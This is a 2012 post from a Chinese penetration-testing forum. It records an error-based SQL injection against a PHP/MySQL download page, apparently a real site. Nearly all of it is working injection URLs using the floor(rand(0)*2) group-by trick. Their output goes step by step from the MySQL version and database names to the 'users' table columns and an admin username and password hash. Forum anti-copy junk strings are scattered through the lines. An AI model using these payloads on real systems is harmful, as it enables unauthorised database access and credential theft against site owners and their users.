中国网络渗透测试联盟

标题: php+mysql高级爆错注入经测算有效 [打印本页]
作者: admin    时间: 2012-9-13 17:52
标题: php+mysql高级爆错注入经测算有效
http://www.wooyun.org/bugs/wooyun-2010-01666
1 C8 Y, C+ t6 ~3 C6 L1 @2 l
/ I" ]; T& `- [# U* s3 x之前想找个测试 没想到这有 可以测试下做个记录而已
4 H3 z$ P8 W; A/ F: X( L2 ?* \  ^3 t+ I' n: Q
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
+ t9 Y8 y$ A' \- x+ \6 J
1 [* c, p  Q  S; I/data0/htdocs/leqi_new/app/myapp.php
% u9 z* w( a4 G* H5 \* a0 ~6 X+ c. `9 O  B9 s! J1 @
或者
7 o5 m8 [9 p% p8 e
- N5 }7 Q' F$ }$ `! _4 ?/**********version()**********/ 5.1.49-log
. c6 a0 p# F$ vhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
4 u5 z% P+ e% K: q# M; m8 i4 j5 B8 p( g/ V) y
/**********user()**********/  
8 {& H( d! F  p% r5 p4 jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003- \$ V& K* D5 ^4 R* b1 T
  t6 f1 \/ B4 p* p
/**********database()**********/  leqi8 v% l& N5 B9 H; P, O
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
$ x0 h5 a9 u4 I" ?2 S" u+ |) K% t8 B
/**********limit依次递归爆库**********/- M- h) j* H. W) _1 I; O% p
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
( E/ U" d* S2 H0 G1 @8 K" uinformation_schema! Q/ @4 ?3 G0 I+ N7 w
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003; t  I& w- l/ [+ Y- O
leqi
7 W0 S0 f9 y8 \. R* N& |7 W/ Ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 Z4 `# X( c! F& J) m
test" K1 h0 p7 Q* g4 K9 L, e+ M: J

8 T6 j5 a9 J* }" Q$ A/**********limit依次递归爆表名**********/& A: X: I0 s. {; O( |  l! J
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0034 B; B6 Y. Z0 \0 f
users
$ _+ s& U) z8 I
$ _& s8 ?% t3 y# r0 g/**********limit依次递归爆字段名**********/( x* k5 P# g5 r4 c$ P4 q; m1 h
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003/ K& B/ M% U3 Y
user_id,username,nickname,passwd,group_id' K3 C8 H: u, }  I5 N9 ^
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
5 {! Q: P9 u+ x, B! Z# r4 q9 t/wapc/5000_0005_003( p$ t+ R: z# v$ E
11 210 N2 X- A8 ^* Y( [
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23- C! R# S* o- D# H6 \1 Q' C/ y# A
/wapc/5000_0005_003
. u# ?9 a0 V* h& ?' i11 341 351 361" o; Z# V4 k. L1 i0 P! R
/**********爆数据**********/8 V( \+ {2 i% [# n. w
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23( A. f+ A  y2 D. A- T; Q4 n
admin
; }2 `& d& j1 R, Jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23: s3 H5 @! x) }: L
6a8b4574ca231eb8bd52764d4978ffcd
# H% X7 B% d* Y4 Q8 t$ ~  t- q
1 i, [( ]9 u, y! G2 z" C( j( M
8 |4 o- `( ~- I/ h0 h



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2